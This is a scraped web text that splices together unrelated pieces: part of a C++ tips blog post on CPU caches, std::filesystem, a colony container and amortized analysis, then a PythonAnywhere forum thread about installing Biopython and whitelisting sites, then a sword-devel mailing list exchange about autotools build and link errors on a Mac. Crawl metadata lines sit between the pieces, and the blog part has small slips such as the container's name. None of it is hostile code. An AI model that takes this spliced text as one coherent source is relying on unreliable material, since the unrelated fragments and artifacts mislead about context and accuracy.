cache. The closer to the CPU it is the faster, the smaller and more expensive it is. Size of L1 cache - the closest to the CPU is usually tens of KBs, L2 is hundreds of KBs, L3 is several MBs. In theory you can make a CPU with MBs of L1 cache but it will be ridiculously expensive and probably this cache will go to waste if it is not designed to do very specific task all of the time. Because of the bottleneck we end up with the CPU waiting for data to come from RAM through all cache levels and back. Hardware vendors apply various strategies to handle this. One example is branch prediction - if the CPU has to evaluate a condition to decide which branch of the if to take and it has to wait for some data in order to do the evaluation, the branch predictor decides that one of the branches is more probable and the CPU starts executing it. When the data arrives and if the prediction is correct - win! else CPU rolls back and starts evaluating the other branch. However those are general purpose heuristics and one can not depend on them too much so the software developers have to do their part too - data locality, aligned structs, etc. 3. std::filesystem From C++17 we'll have the std::filesystem library as part of the STL which provides portable way to work with the file system and its components - paths, files, etc. It is based on boost::filesystem that has been around for quite long. Simple example of using recursive_directory_iterator: using namespace std::filesystem;this will print all the files in the current folder and its subfolders. recursive_directory_iterator returns has non-member begin and end functions and operator++ - that's why the range-based for loop works. for (auto& p : recursive_directory_iterator(current_path())) std::cout << p << '\n'; We can easily define a range with it and in the future we'll be able to use it with the Ranges library. 4. PFL Colony pfl::colony is a container written by Matthew Bentley optimized for rapid insertion and deletion of elements which does not invalidates the pointers to the non-erased elements. I've heard about it on CppCast. Motivation for developing it comes from game engine development and I found interesting to read about the use cases and the problems they hit while developing game engines. There is a excellent talk from him at CppCon 2016. 5. Amortized analysis Amortized analysis is method for analyzing an algorithm's running time. It provides an upper bound of the expense of an operation evaluated over a sequence of operations. It differs from worst-case-per-operation upper bound where the evaluation of the sequence is the sum of the worst case of every operation by looking at the sequence as a whole thus allowing one operation to have a huge cost so the sequential operations are lest costly. A typical example is std::vector. If the reserved space is full before a push_back it reallocates with double capacity and moves elements to the new memory location - O(N) complexity - however the next n elements are inserted at the back with O(1) complexity. Thus pushing back in a std::vector has O(1) amortized complexity. Here is a nice paper from Rebecca Fiebrink about amortized analysis.
http://dvmirchevcpp.blogspot.com/2017/01/c-tips-2017-week-3-16-jan-22-jan-2017.html
CC-MAIN-2017-51
refinedweb
873
50.87
Is there any way to get BioPython installed? It requires gcc, so easy_install and "python setup.py build" choke at that point. Thanks, Andreas Is there any way to get BioPython installed? It requires gcc, so easy_install and "python setup.py build" choke at that point. Thanks, Andreas Hi Andreas, We are about to release it. Not sure if we have all the pieces so would love it if you gave it a try when we do. Cheers Hi, I just have tried Biopython and I wonder if you need to whitelist some of the places it accesses such as: and ? See below my attempts following instructions at They get denied. Thanks, Wayne My attempts: >>> from Bio.PDB import* >>> pdbl=PDBList() >>> pdbl.retrieve_pdb_file('1D66') Downloading PDB structure '1D66'... Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/local/lib/python2.7/site-packages/biopython-1.60-py2.7-linux-x86_64.egg/Bio/PDB/PDBList.py", line 241, in retrieve_pdb_file lines = _urlopen(url).read() File "/usr/local/lib/python2.7/urllib2.py", line 126, in urlopen return _opener.open(url, data, timeout) File "/usr/local/lib/python2.7/urllib2.py", line 400, in open response = self._open(req, data) File "/usr/local/lib/python2.7/urllib2.py", line 418, in _open '_open', req) File "/usr/local/lib/python2.7/urllib2.py", line 378, in _call_chain result = func(*args) File "/usr/local/lib/python2.7/urllib2.py", line 1387, in ftp_open fw = self.connect_ftp(user, passwd, host, port, dirs, req.timeout) File "/usr/local/lib/python2.7/urllib2.py", line 1409, in connect_ftp persistent=False) File "/usr/local/lib/python2.7/urllib.py", line 864, in init self.init() File "/usr/local/lib/python2.7/urllib.py", line 870, in init self.(self.host, self.port, self.timeout) File "/usr/local/lib/python2.7/ftplib.py", line 132, in connect self.sock = socket.create_connection((self.host, self.port), self.timeout) File "/usr/local/lib/python2.7/socket.py", line 571, in create_connection raise err urllib2.URLError: <urlopen error ftp error: [Errno 111] Connection refused> I have opened up rcsb.org and nih.gov. You can download the PDB you wanted by changing the PDBList line to: pdbl=PDBList(server='') Thanks! Plus I just found it also now works using Biopython's interface to access NCBI's Entrez databses as described at . Hi Glenn, I was working through more of the examples at and was finding the parser for Biopython isn't working as the examples show? Could this be related to the package installation or another network issue? Specifically, I follow section 8.2 at: from Bio import Entrez handle = Entrez.einfo() record = Entrez.read(handle) And then I get an error in the parser saying it isn't XML but if I enter: result = handle.read() print result I see clearly it is XML beginning with "<?xml version="1.0"?> " Thanks, Wayne That's weird. I can run the 3 lines fine on a free account. I get a record that looks OK. Could you post the full stack-trace, please? Yes, in a new console it works. So far everything has worked. Thus I'll stop doubting the installation. I think I must have defined something previously and could not clear it even though I started the series of commands again. I should have known to test it in a new console first before bothering you. Thanks, Wayne Hi All, I'm trying to make a tree and identify some 16s rRNA sequencing with genbank using biopython, but I have no Idea how can I start. Could you please help me? Hi Eleiloon, If you've already got basic Python scripts running in your PythonAnywhere account, then next you may want to look into the BioPython Tutorial and Cookbook. Section 7.2.3. seems particularly pertinent. Were you able to work through some of the documentation exercises? Also this link might help. Hopefully one of those links helps.
https://www.pythonanywhere.com/forums/topic/23/
CC-MAIN-2018-17
refinedweb
662
70.9
Probably the easiest way is to use printf/sprintf: $unrounded = 0.66666; printf "$unrounded rounded to 3 decimal places is %.3f\n", $unrounded; $rounded = sprintf "%.2f", $a; # rounded to 2 decimal places (0.67) [download] As in How do I round a number? — Math::Round has a great method for this: use Math::Round; print nearest(.01, 1.555); [download] This other answer, by wrvhage, has the great property of working correctly for values like 3.005 rounded to two places (where sprintf is not). However, it needs a couple of tweaks to work for negative numbers. sub stround { my( $n, $places ) = @_; my $sign = ($n < 0) ? '-' : ''; my $abs = abs $n; $sign . substr( $abs + ( '0.' . '0' x $places . '5' ), 0, $places ++ length(int($abs)) + 1 ); } [download] sub stround { my( $number, $decimals ) = @_; substr( $number + ( '0.' . '0' x $decimals . '5' ), 0, $decimals + + length(int($number)) + 1 ); } [download] This; } [download] Perhaps not as fast as printf, but pretty fast, and not using anything special: sub round { my ($nr,$decimals) = @_; return (-1)*(int(abs($nr)*(10**$decimals) +.5 ) / (10**$decimals)) + if $nr<0; return int( $nr*(10**$decimals) +.5 ) / (10**$decimals); } [download] Please (register and) log in if you wish to add an answer Yes! No way! Results (107 votes). Check out past polls.
https://www.perlmonks.org/?node_id=1873
CC-MAIN-2018-26
refinedweb
212
78.85
Contribute to SSAGES¶ The SSAGES project is built on an inclusive and welcoming group of physicists, chemists, and chemical engineers working on complex Molecular Dynamics simulations employing Metadynamic techniques. Metadynamics is an exciting and fast developing field and similarly this project is designed to facilitate the usage and implementation of a wide array of Metadynamics methods. And we welcome you heartily to join us and to embark with us on this great adventure. There are many ways to contribute to SSAGES and you do not necessarily need programming skills to be part of this project (even though they surely help). But, if you decide to work on the code base, you will be happy to find that SSAGES is designed to be easy to use and is just as easy to extend. We put a high priority on maintaining a readable and clearly structured code base as well as an inclusive community welcoming new ideas and contributions. Here is a short summary of ideas how you can become part of SSAGES: - Reporting, Triaging, and Fixing Bugs - No software is without errors, inconsistencies, and strange behaviors. Even with zero programming knowledge, you can help tremendously by reporting bugs or confirming issued bugs. Read more… - Improving the SSAGES documentation - SSAGES would like to have a detailed yet comprehensive documentation on what it does and how it does it. This should include concise introductions to the methods, quick to learn tutorials, complete coverage of the nooks and crannies of each method, and of course helpful pointers in case you run into errors. And while the documentation is already expansive, improvements on it never go unappreciated. Read more… - Including your Method and CV in SSAGES - You have developed a new Metadynamics scheme or a Collective Variable and want to make it available to the community via SSAGES? Great! Read more… - Working on the core SSAGES system - If you would like to climb into the heart of SSAGES and get your hands dirty, this task is for you. Read more… Improving the Documentation¶ Great documentation and great code produces great software. -SSAGE advice Improvements on the documentation are always highly appreciated. The SSAGES documentation is split into two parts: The User Manual (which you are reading right now), and the API documentation. While the Manual uses the Sphinx documentation and contains all information necessary to use the program, the API docs are bulit on Doxygen and describe the usage of the underlying classes and functions for everyone willing to extend and improve SSAGES. Here are a few ideas on how you can help: - Fix typos: Even though we have thoroughly checked, there are certainly still a few hidden somewhere. - Check if all internal and external links are working. - Make sure that the documentation is up to date, i.e. that it reflects the usage of the latest version. - Add examples: An examples on how to use a method, avoid a common problem, etc. are more helpful than a hundred pages of dry descriptions. - Write a tutorial. Building the documentation¶ Before you can work on the documentation, you first have to build it. The documentation is part of the SSAGES source code. It is assumed that you have already downloaded and built the source code as described in the Getting Started section. You will find a collection of rst files comprising the User Manual under doc/source/ where the file ending rst stands for ReStructured Text. The API documentation on the other hand resides directly in the header files right next to the classes and functions they describe. Assuming you have already built SSAGES, building the documentation is as easy as typing make doc in your build directory. In order to make correctly check that you have the following programs installed: - Sphinx (with PyPI via pip install Sphinxfor example) - Doxygen - dot (in Ubuntu this is part of the graphViz package) - Sphinx “Read the docs” theme (via pip install sphinx_rtd_theme) Once you have successfully built the documentation you will find the User Manual under doc/Manual/ and the API documentation under doc/API-doc/html/ (relative to your build directory - do not confuse it with the doc/ folder in the main directory of the project). To view it in your favorite web browser (using FireFox as an example) just type firefox doc/Manual/index.html for the User Manual or firefox doc/API-doc/html/index.html for the API documentation. How to write documentation¶ Here are a few pointers on how to write helpful documentation, before we dive into the details of Sphinx and Doxygen for the User Manual and the API documentation: Write documentation “along the way”. Do not code first and write the documentation later. Use helpful error messages. These are considered part of the documentation and probably are the part that is read most frequently. Do everything you can to structure the text. Let’s face it: Most people will just skim the documentation. Feel encouraged to use all techniques that help to spot the relevant information, for example: - Format your text bold, italic, code, etc. - Write in short paragraphs, use headers - Use lists, code blocks, tables, etc. Note These Note blocks are extremely helpful for example. Warning Warnings work great, too! See also Here you can find more examples for helpful Sphinx markup: Use examples, a lot of them In the initial stages: Don’t be a perfectionist. Missing documentation is the worst kind of documentation. “It is better to have written and coded than to have never written at all.” -SSAGE advice How to write Sphinx¶ The Sphinx documentation system uses ReStructured text which is loosely based on the markdown format. Examples for documentations written with Sphinx include: The following tutorials are extremely helpful: - - - One of the great things of Sphinx is that most documentations have a “view page source” link where you can take a look at the Sphinx source code. Thus, the best way to learn Sphinx is to click on this link right now and look at the source code of this page. But here is a short summary of the most important commands: - Markup: You can use *italic*, **bold**, and ``code`` for italic, bold and code. - Headers. Underline your headers with at least three ===for titles, ---for subtitles, ^^^for subsubtitles and ~~~for paragraphs. - Bullet lists are indicated by lines beginning with *. How to write Doxygen¶ Doxygen follows a very different philosophy compared to Sphinx and is more steered towards API documentation, exactly what we use it for in SSAGES. Instead of maintaining the documentation separate from the source code, the classes and functions are documented in the same place where they are declared: The header files. Doxygen then reads the source code and automatically builds the documentation. Examples for documentation created with Doxygen: The mainpage of the Doxygen documentation is written in a separate header file, in our case doc/mainpage.h. A good introduction to the Doxygen syntax can be found at The basic rule is that Doxygen comments start with //! or /*! and document the class, namespace or function that directly follows it. Let’s start with a short example: //! Function taking the square of a value /*! * \param val Input value * \returns Square of the input value * * This function calculates the square of a given value. */ double square(double val) { return val*val; } This example documents the function square() which simply calculates the square of a number. The first line, starting with //!, is the brief description and should not be longer than one line. The second comment block, starting with /*! is the full description. Here, two special commands are used: - \param - This command documents one parameter of the function - \returns - This command documents the return value of the function There are many special Doxygen commands. They all start with a backslash and the most important, apart from the two mentioned above, are: - \tparam - Used to document a template parameter. - \ingroup - This class is part of a group, such as Methods or Core. The groups are defined in doc/mainpage.h. Helpful are also boxes highlighting a given aspect of the function, such as: - \attention - Puts the following text in a raised box. A blank line ends the attention box. - \note - Starts a highlighted block. A blank line ends the note block. - \remark - Starts a paragraph where remarks may be entered. - \see - Paragraph for “See also”. - \deprecated - The documented class or function is deprecated and only kept for backwards compatibility. - \todo - Leave a ToDo note with this command. You can also highlight your text: - \em - For italic word. To highlight more text use <em> Highlighted text </em>. - \b - For bold text. To highlight more text use <b> Bold text </b>. - \c - For typewriter font. To have more text in typewriter font, use <tt>Typewriter Font</tt>. - \code - Starts a codeblock. The block ends with \endcode. - \li - A line starting with \li is an entry in a bullet list. Another big benefit of doxygen is that you can use a lot of LaTeX syntax. For example: - \f$ - Starts and ends an inline math equation, similar to $ in Latex. - \f[ and \f] - Start and end a display-style LaTeX equation. - \cite <label> - Cite a reference. The references are listed in doc/references.biband follow the BibTex syntax. Doxygen is very clever in producing automatic links. For example, there exists a class Method in SSAGES. Thus, Doxygen automatically creates a link to the documentation of this class where the word “Method” appears. This does, however, not work for the plural, “Methods”. Instead, you can write \link Method Methods \endlink. On the other hand, if you want to prevent Doxygen from creating an autolink, put a % in front of the word. What to document¶ We are aiming for a comprehensive documentation of all the methods available in SSAGES as well as the core features. Thus, for each method the documentation should include - An introduction into the method, what it does and how it does it. - A short tutorial based on one of the working examples. The reader should be able to complete the tutorial in ~30min and should leave with a sense of accomplishment, e.g. a nice energy profile or a picture of a folded protein. - A detailed description on how to use the method, the parameters, constraints, requirements, etc. Adding your method to SSAGES¶ So, you have developed a new Metadynamics method or a new collective variable (CV)? Great! SSAGES is about collaboration and integrating your new CV or method is a priority. But before we do that, make sure you check the following boxes: - Your code needs to compile and run (obviously). - If you have implemented a new method, this method should have been published in a peer reviewed journal and the publication should be cited in the documentation of the method (see next point). If you have implemented a CV, please give a small example of usage. In which case(s) does the new CV come in handy? - Your method needs to come with the necessary documentation. For others to be able to use your method, you will have to explain how it works. You can take a look at the section “How to improve the documentation” for a starter on how to write good documentation. - Please provide an example system. This could be the folding of an Alanine Dipeptide molecule, a NaCl system or just a toy model with a simple energy landscape. As long as the system is small and the method can easily complete within a few hours, it will be fine. Once these boxes have been checked, our team of friendly code-reviewers will take a look at your source code and help you meet the high standard of the SSAGES code.
http://miccomcodes.org/manual/Contribute%20to%20SSAGES.html
CC-MAIN-2019-26
refinedweb
1,949
63.59
Buy Access 2010 All-in-One For Dummies (en) Static files understatic theenv variables element engine notmentioned here. With HTML5 and CSS3, you in which you your own code, a traditional web to profile (en) Displaying the logged where to handle the. You can configure in General The elements, the resulting time 3Understanding the Anatomy loading, this chapter supports Secure Sockets specialized be secured with of your web to finish. For specific Java browser window caching using memcache classes, you can system itself can. If you use Now that you to specify which use with software structure similar to the preceding example, in order to exceed daily quota you. In addition, the default, Google App clever business model request to _ahwarmup and do not web.xml. Measuring the Cost Using Warm Up Requests When show you the XMPP, Task Queue to or dynamic instances, because this can sometimes predict performance optimization more. A full explanation of CIDR is Messaging and Presence a physical machine traditional web application find be used to in the datastore the cloud. Listing 3.1Specifying difference, the web.xml was reduced to 8 02 shown xmlnshttpappengine.google.comns1.0 03 dummies an Absolute 04 version1versionSetting Up 01 xml version1.0 Listing buy appengine web app xmlnsxsihttp instance 03 xmlnshttpjava.sun.comxmlnsjavaee 04 xmlnswebhttpjava.sun.comxmlnsjavaeeweb app_2_5.xsd 05 xsischemaLocationhttpjava.sun.comxmlnsjavaee 06httpjava.sun.comxmlnsjavaeeweb 08 exclude pathresources.xml 09 static files Cost of Class resource files 12 include path.xml 13 exclude pathstatic.jpg 14 09 16 Template 17 system properties 18 property nameblog.production class access 14 servlet class valueWEB INFlogging.properties 21 system properties 22 23 env 18 url patternsturl var nameLANGUAGE for mapping 20 for ptg7068951 26 27 ssl at the log files before and enabled 30 31 user permissions 32. This means that them dummies by If you do deployment tool expects software stacks can application is to of a WAR your web application. But then you would lose a shown in Listing the servers running. Note Strictly speaking, HTTP buy access (en) 2010 for dummies all-in-one both lib folders are request handlers and configure permissions efficient loading times. AJAX, providing details on warm up is found on on httpcode.google.com. buy oem tuneup utilities 2008 The power operations, virtual hardware denition, Virtual Buy OEM Ableton Suite 8 and information are found previous version is of your code the localhost reference model used to managed object being have. The latter also provided some service.This clearly is xmlnsxsihttp instance security for situations new items or a session token by successfully VI SDK 2.0 work.The examples access of management invoke operations 370_VMware_Tools_03.qxd101206643 PMPage 111 111 to the interface we will discuss briey.The key 2010 DatastoreDatastoreSummaryDescribes (en) (en) to gain Web service running the VimApinamespace and resources. There are too many datatypes to. Response to detected information about changes CheckValidationResult function is plus time. buy autodesk motionbuilder 2011 (en) Rarely have avoid having to from that you backup can be and agent install to the disaster.These are small as possible.This approach do, you can onto your ESX an operating system. The script does the business come agent with hot what needs to Full VM Server importance of the disaster RTO system that you the TAR package VM is often that will be following steps 1. Replication solutions are generally many (en) create buy new 306 Centralized Backups as Part the data you to as current This is the and match the VM is access overlooked when Buy Access 2010 All-in-One For Dummies (en) Databases 29.95$ SnagIt 2.2 MAC cheap oem uncommitted into the VM 2010 days work, then only back Figure dummies By default, it a hot backup of a virtual machine, you are data matters.The data is run.The output into applications and data your business after the crash. Menú Usuario buy cheap lynda.com - photoshop for designers: type effects This is a Success Secrets on traffic on the primary network, the with 32 bit VMware server on set of peripherals. The software will satisfied users of machines created by buy for your other than VMware on host systems. VMware 100 bit extension support 120 To of the original running the VMware Server VMware the boot system training in instructor functionality. The general steps months ago they able to clear 5 and as such there are remove program functionality of the development and reviewing have been eagerly anticipating such an offering and have users reboot a lot less. VMware 100 Success Secrets from VM, acronym environment of (en).
http://www.musicogomis.es/buy-access-2010-all-in-one-for-dummies-en/
CC-MAIN-2015-22
refinedweb
769
55.74
APIs, downloading files, and so on. Some developers prefer using Postman for testing APIs but PycURL is another suitable option to do so as it supports multiple protocols like FILE, FTPS, HTTPS, IMAP, POP3, SMTP, SCP, SMB, etc. Moreover, PycURL comes in handy when a lot of concurrent, fast, and reliable connections are required. As mentioned above, PycURL is an interface to the libcURL library in Python; therefore PycURL inherits all the capabilities of libcURL. PycURL is extremely fast (it is known to be much faster than Requests, which is a Python library for HTTP requests), has multiprotocol support, and also contains sockets for supporting network operations. Pre-requisites Before you go ahead with this tutorial, please note that there are a few prerequisites. You should have a basic understanding of Python's syntax, and/or have at least beginner-level programming experience in some other language. Furthermore, you should have a good understanding of common networking concepts like protocols and their types, and the client-server mode of communication. Familiarity with these concepts is essential to understand the PycURL library. Installation The installation process for PycURL is fairly simple and straightforward for all operating systems. You just need to have libcURL installed on your system in order to use PycURL. Mac/Linux OS For Mac OS and Linux, PycURL installation is the simplest as it has no dependencies, and libcURL is installed by default. Simply run the following command in your terminal and the installation will be completed: Installation via pip $ pip install pycurl Installation via easy_install $ easy_install pycurl Windows OS For Windows, however, there are a few dependencies that need to be installed before PyCURL can be used in your programs. If you are using an official distribution of Python (i.e. you've downloaded a Python version from the official website) as well as pip, you simply need to run the following command in your command line and the installation will be done: $ pip install pycurl If you are not using pip, EXE and MSI installers are available at PycURL Windows. You can download and install them directly from there, like any other application. Basic Code Examples In this section, we are going to cover some PycURL coding examples demonstrating the different functionalities of the interface. As mentioned in the introduction section, PycURL supports many protocols and has a lot of sophisticated features. However, in our examples, we will be working with the HTTP protocol to test REST APIs using HTTP's most commonly used methods: GET, POST, PUT and DELETE, along with a few other examples. We will write the syntax for declaring them in Python 3, as well as explain what they do. So lets start! Example 1: Sending an HTTP GET Request A simple network operation of PycURL is to retrieve information from a given server using its URL. This is called a GET request as it is used to get a network resource. A simple GET request can be performed using PycURL by importing the BytesIO module and creating its object. A CURL object is created to transfer data and files over URLs. The desired URL is set using the setopt() function, which is used as setopt(option, value). The option parameter specifies which option to set, e.g. URL, WRITEDATA, etc., and the value parameter specifies the value given to that particular option. The data retrieved from the set URL is then written in the form of bytes to the BytesIO object. The bytes are then read from the BytesIO object using the getvalue() function and are subsequently decoded to print the HTML to the console. Here is an example of how to do this: import pycurl from io import BytesIO b_obj = BytesIO() crl = pycurl.Curl() # Set URL value crl.setopt(crl.URL, '') # Write bytes that are utf-8 encoded crl.setopt(crl.WRITEDATA, b_obj) # Perform a file transfer crl.perform() # End curl session crl.close() # Get the content stored in the BytesIO object (in byte characters) get_body = b_obj.getvalue() # Decode the bytes stored in get_body to HTML and print the result print('Output of GET request:\n%s' % get_body.decode('utf8')) Output: Output of GET request: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" ""> <html> <head> <meta http- <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http- <meta name="robots" content="index,nofollow"> <title>BeginnersGuide - Python Wiki</title> <script type="text/javascript" src = "/wiki/common/js/common.js" ></script> <script type = "text/javascript" > <!-- var search_hint = "Search"; //--> </script> . . . Example 2: Examining GET Response Headers You can also retrieve the response headers of a website with the help of PycURL. Response headers can be examined for several reasons, for example, to find out what encoding has been sent with the response and whether that is according to the encoding provided by the server. In our example, we'll be examining the response headers simply to find out various attribute names and their corresponding values. In order to examine the response headers, we first need to extract them, and we do so using the HEADERFUNCTION option and display them using our self-defined function ( display_header() in this case). We provide the URL of the site whose response headers we wish to examine; HEADERFUNCTION sends the response headers to the display_header() function where they are appropriately formatted. The response headers are decoded according to the specified standard and are split into their corresponding names and values. The whitespaces between the names and values are stripped and they are then converted to lowercase. The response headers are then written to the BytesIO object, are transferred to the requester and are finally displayed in the proper format. from io import BytesIO import pycurl headers = {} def display_header(header_line): header_line = header_line.decode('iso-8859-1') # Ignore all lines without a colon if ':' not in header_line: return # Break the header line into header name and value h_name, h_value = header_line.split(':', 1) # Remove whitespace that may be present h_name = h_name.strip() h_value = h_value.strip() h_name = h_name.lower() # Convert header names to lowercase headers[h_name] = h_value # Header name and value. def main(): print('**Using PycURL to get Twitter Headers**') b_obj = BytesIO() crl = pycurl.Curl() crl.setopt(crl.URL, '') crl.setopt(crl.HEADERFUNCTION, display_header) crl.setopt(crl.WRITEDATA, b_obj) crl.perform() print('Header values:-') print(headers) print('-' * 20) main() Output: **Using PycURL to get Twitter Headers** Header values:- {'cache-control': 'no-cache, no-store, must-revalidate, pre-check=0, post-check=0', 'content-length': '303055', 'content-type': 'text/html;charset=utf-8', 'date': 'Wed, 23 Oct 2019 13:54:11 GMT', 'expires': 'Tue, 31 Mar 1981 05:00:00 GMT', 'last-modified': 'Wed, 23 Oct 2019 13:54:11 GMT', 'pragma': 'no-cache', 'server': 'tsa_a', 'set-cookie': 'ct0=ec07cd52736f70d5f481369c1d762d56; Max-Age=21600; Expires=Wed, 23 Oct 2019 19:54:11 GMT; Path=/; Domain=.twitter.com; Secure', 'status': '200 OK', 'strict-transport-security': 'max-age=631138519', 'x-connection-hash': 'ae7a9e8961269f00e5bde67a209e515f', 'x-content-type-options': 'nosniff', 'x-frame-options': 'DENY', 'x-response-time': '26', 'x-transaction': '00fc9f4a008dc512', 'x-twitter-response-tags': 'BouncerCompliant', 'x-ua-compatible': 'IE=edge,chrome=1', 'x-xss-protection': '0'} -------------------- In cases where we have multiple headers with the same name, only the last header value will be stored. To store all values in multi-valued headers, we can use the following piece of code: if h_name in headers: if isinstance(headers[h_name], list): headers[name].append(h_value) else: headers[h_name] = [headers[h_name], h_value] else: headers[h_name] = h_value Example 3: Sending Form Data via HTTP POST A POST request is the one that sends data to a web server by enclosing it in the body of the HTTP request. When you upload a file or submit a form, you are basically sending a POST request to the designated server. A POST request can be performed using PycURL by firstly setting the URL to send the form data to through the setopt function. The data to be submitted is first stored in the form of a dictionary (in key value pairs) and is then URL-encoded using the urlencode function found in the urllib.parse module. We use the POSTFIELDS option in sending form data as it automatically sets the HTTP request method to POST, and it handles our pf data as well. from urllib.parse import urlencode import pycurl crl = pycurl.Curl() crl.setopt(crl.URL, '') data = {'field': 'value'} pf = urlencode(data) # Sets request method to POST, # Content-Type header to application/x-www-form-urlencoded # and data to send in request body. crl.setopt(crl.POSTFIELDS, pf) crl.perform() crl.close() Note: If you wish to specify another request method, you can use the CUSTOMREQUEST option to do so. Just write the name of the request method of your choice in the empty inverted commas following crl.CUSTOMREQUEST. crl.setopt(crl.CUSTOMREQUEST, '') Example 4: Uploading Files with Multipart POST There are several ways in which you can replicate how a file is uploaded in a HTML form using PycURL: - If the data to be sent via POST request is in a file on your system, you need to firstly set the URL where you wish to send the data. Then you specify your request method as HTTPPOSTand use the fileuploadoption to upload the contents of the desired file. import pycurl crl = pycurl.Curl() crl.setopt(crl.URL, '') crl.setopt(crl.HTTPPOST, [ ('fileupload', ( # Upload the contents of the file crl.FORM_FILE, './my-resume.doc', )), ]) crl.perform() crl.close() Note: If you wish to change the name and/or the content type of the file, you can do so by making slight modifications to the above code: crl.setopt(crl.HTTPPOST, [ ('fileupload', ( # Upload the contents of this file crl.FORM_FILE, './my-resume.doc', # Specify a file name of your choice crl.FORM_FILENAME, 'updated-resume.doc', # Specify a different content type of upload crl.FORM_CONTENTTYPE, 'application/msword', )), ]) - For file data that you have in memory, all that varies in the implementation of the POST request is the FORM_BUFFERand FORM_BUFFERPTRin place of FORM_FILEas these fetch the data to be posted, directly from memory. import pycurl crl = pycurl.Curl() crl.setopt(crl.URL, '') crl.setopt(crl.HTTPPOST, [ ('fileupload', ( crl.FORM_BUFFER, 'contact-info.txt', crl.FORM_BUFFERPTR, 'You can reach me at [email protected]', )), ]) crl.perform() crl.close() Example 5: Uploading a File with HTTP PUT PUT request is similar in nature to POST request, except for the fact that it can be used to upload a file in the body of the request. You use a PUT request when you know the URL of the object you want to create or overwrite. Basically PUT replaces whatever currently exists at the target URL with something else. If the desired data to be uploaded is located in a physical file, you first need to set the target URL, then you upload the file and open it. It's important for the file to be kept open while the cURL object is using it. Then the data is read from the file using READDATA. Finally, the file transfer (upload) is performed using the perform function and the cURL session is then ended. Lastly, the file that was initially opened for the CURL object is closed. import pycurl crl = pycurl.Curl() crl.setopt(crl.URL, '') dat_file = open('data.txt') crl.setopt(crl.UPLOAD, 1) crl.setopt(crl.READDATA, dat_file) crl.perform() crl.close() dat_file.close() If the file data is located in a buffer, the PycURL implementation is pretty much the same as that of uploading data located in a physical file, with slight modifications. The BytesIO object encodes the data using the specified standard. This is because READDATA requires an IO-like object and encoded data is essential for Python 3. That encoded data is stored in a buffer and that buffer is then read. The data upload is carried out and upon completing the upload, the cURL session is ended. import pycurl crl = pycurl.Curl() crl.setopt(crl.URL, '') data = '{"person":{"name":"billy","email":"[email protected]"}}' buffer = BytesIO(data.encode('utf-8')) crl.setopt(crl.UPLOAD, 1) crl.setopt(crl.READDATA, buffer) crl.perform() crl.close() Example 6: Sending an HTTP DELETE Request Another important and much used HTTP method is DELETE. The DELETE method requests that the server deletes the resource identified by the target URL. It can be implemented using the CUSTOMREQUEST function, as can be seen in the code sample below: import pycurl crl = pycurl.Curl() crl.setopt(crl.URL, "") crl.setopt(crl.CUSTOMREQUEST, "DELETE") crl.perform() crl.close() Example 7: Writing to a File PycURL can also be used to save a response to a file. We use the open function to open the file and response is returned as a file object. The open function is of the form: open(file, mode). The file parameter represents the path and name of the file to be opened and mode represents the mode in which you want to open the file. In our example, it is important to have the file opened in binary mode (i.e. wb) in order to avoid the encoding and the decoding the response. import pycurl file = open('pycurl.md','wb') crl = pycurl.Curl() crl.setopt(crl.URL, '') crl.setopt(crl.WRITEDATA, file) crl.perform() crl.close() Conclusion In this tutorial, we learnt about the PycURL interface in Python. We started off by talking about some of the general functions of PycURL and its relevance with the libcURL library in Python. We then saw the PycURL's installation process for different operating systems. Lastly, we went through some of PycURL's general examples which demonstrated the various functionalities offered by PycURL, like the HTTP GET, POST, PUT, and DELETE methods. After following this tutorial, you should be able to fetch objects identified by a URL within a Python program with ease.
https://stackabuse.com/using-curl-in-python-with-pycurl/
CC-MAIN-2021-17
refinedweb
2,294
54.83
Definition An instance S of the parameterized data type set<E> is a collection of elements of the linearly ordered type E, called the element type of S. The size of S is the number of elements in S, a set of size zero is called the empty set. #include < LEDA/core/set.h > Creation Operations Iteration forall(x, S) { ``the elements of S are successively assigned to x'' } Implementation Sets are implemented by randomized search trees [2]. Operations insert, del, member take time O(log n), empty, size take time O(1), and clear takes time O(n), where n is the current size of the set. The operations join, intersect, and diff have the following running times: Let S1 and S2 be a two sets of type T with | S1 | = n1 and | S2 | = n2. Then S1.join(S2) and S1.diff(S2) need time O(n2log(n1 + n2)), S1.intersect(S2) needs time O(n1log(n1 + n2).
http://www.algorithmic-solutions.info/leda_manual/set.html
crawl-002
refinedweb
159
62.07
Great that's fixed my problem. Thanks. I've compiled sword, but there remain a couple of problems. When finally finishing compiling both the i386 and ppc architectures are specified. It works if I just remove the -arch i386, but I do that by hand, /bin/sh ../libtool --mode=link g++ -ftemplate-depth-25 -DCURLAVAILABLE -g -O2 -o libsword.la -rpath /usr/local/lib -release 1.5.7.100 swkey.lo listkey.lo ...... flatapi.lo -lcurl -L/usr/lib -lcurl -arch i386 -arch ppc -lz -lssl -lcrypto -lz -lz and g++ -dynamiclib -arch i386 -arch ppc -single_module -flat_namespace -undefined suppress -o .libs/libsword-1.5.7.100.dylib .libs/swkey.o .libs/listkey.o ..... and then when it comes to compile the tests I get an undefined symbol g++ -ftemplate-depth-25 -DCURLAVAILABLE -g -O2 -o .libs/testlib testlib.o -Wl,-bind_at_load ./lib/.libs/libsword-1.5.7.100.dylib -L/usr/lib -lcurl -lssl -lcrypto -lz ld: Undefined symbols: sword::LocaleMgr::addLocale(sword::SWLocale*) On 17 Apr 2005, at 12:19 am, Daniel Glassey wrote: > Daniel Glassey wrote: >> Troy A. Griffitts wrote: >>> Will, >>> It might be the version of automake/autoconf that you have on >>> your system. But since you mention a link error, does that mean >>> that you are able to run ./configure and make even thought the >>> autogen.sh script thows these warnings? If so, could you post the >>> link error? I don't know much about the build system (dglasseys is >>> the resident expert in that area) but I only get 1 warning when I >>> run ./autogen.sh Below is my version information. It you're able >>> to update your automake/autoconf packages on your mac, maybe that >>> might help. Hope we can get ya working again. >> updating isn't a solution - it should work with whatever comes with >> the system. >> I've replicated the problem and it exists in revision 1770 (before >> the changes I made recently so reverting that won't help). It doesn't >> exist in 1674 and I haven't pinned it down more than that yet. >> or at least this bit appears >> >> lib/Makefile.am:18: libsword_la_SOURCES was already defined in >> >> condition TRUE, which implies condition WITHCURL_TRUE >> >> >> >> ... >> Regards, >> Daniel > > Found it - someone added something to the build system without knowing > what they were doing in rev 1689 ;) > > Regards, > Daniel > _______________________________________________ > sword-devel mailing list: sword-devel at crosswire.org > > Instructions to unsubscribe/change your settings 